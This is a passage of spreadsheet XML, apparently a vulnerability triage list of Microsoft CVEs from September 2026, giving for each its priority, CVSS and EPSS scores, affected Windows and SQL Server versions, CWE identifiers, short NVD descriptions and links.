      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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1" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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6" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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7" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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4" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
